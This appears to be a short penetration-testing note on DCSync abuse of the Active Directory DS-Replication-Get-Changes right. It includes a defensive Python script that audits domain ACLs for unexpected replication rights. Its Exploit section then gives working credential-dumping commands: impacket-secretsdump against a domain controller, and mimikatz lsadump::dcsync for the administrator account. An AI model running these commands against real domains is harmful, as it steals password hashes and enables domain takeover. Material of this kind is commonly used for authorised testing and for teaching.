Tags
Authenticated
DS-Replication-Get-Changes
Identify
Do you control an object with the DS-Replication-Get-Changes ACL?
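The same question from the audit side, as an added example that is not part of the original notes: parse the SDDL of the domain object's ACL and list trustees that hold a replication right but are not expected to. It goes slightly beyond the note by also covering DS-Replication-Get-Changes-All and ACEs that grant every extended right; the SDDL string, SIDs and allowlist are constructed assumptions.

```python
import re

# Extended-right GUIDs (rightsGuid) of the replication rights in the AD schema.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
CONTROL_ACCESS, GENERIC_ALL = 0x100, 0x10000000  # "CR" and "GA" in SDDL

# Assumption: trustees expected to hold these rights; adjust per environment.
# BA=Administrators, ED=Enterprise DCs, DD=Domain Controllers, DA/EA=Domain/
# Enterprise Admins, SY=SYSTEM; RID 516=Domain Controllers, 498=Enterprise RODCs.
EXPECTED_ALIASES = {"BA", "ED", "DD", "DA", "EA", "SY"}
EXPECTED_RIDS = {"516", "498"}

# Constructed sample: SDDL of a domain object's ACL (domain SID is made up).
DOM = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_SDDL = (
    "O:BAG:BAD:AI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOM}-516)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOM}-1105)"
    f"(A;;RPWPCR;;;{DOM}-1106)"   # CR with no object GUID: all extended rights
    "(A;;RPLCLORC;;;AU)"          # read-only ACE, no control access
)

def has_control_access(rights):
    """True if the SDDL rights field (hex mask or 2-letter codes) grants CR/GA."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & (CONTROL_ACCESS | GENERIC_ALL))
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(codes & {"CR", "GA"})

def is_expected(trustee):
    return trustee in EXPECTED_ALIASES or trustee.rsplit("-", 1)[-1] in EXPECTED_RIDS

def unexpected_replication_aces(sddl):
    """Return (trustee, right) for allow ACEs granting replication to others."""
    findings = []
    for body in re.findall(r"\(([^()]*)\)", sddl):
        fields = body.split(";")
        if len(fields) != 6 or fields[0] not in ("A", "OA"):
            continue  # skip malformed, deny and audit ACEs
        _type, _flags, rights, obj_guid, _inherit, trustee = fields
        right = REPL_RIGHTS.get(obj_guid.lower()) if obj_guid else "all extended rights"
        if right and has_control_access(rights) and not is_expected(trustee):
            findings.append((trustee, right))
    return findings

if __name__ == "__main__":
    for trustee, right in unexpected_replication_aces(SAMPLE_SDDL):
        print(f"review: {trustee} holds {right}")
```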
Exploit
impacket-secretsdump 'domain.local'/'<user>':'<pass>'@'<DC0IP>'
From Windows
runas /netonly /user:DOMAIN\user powershell
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:DOMAIN.LOCAL /user:DOMAIN\administrator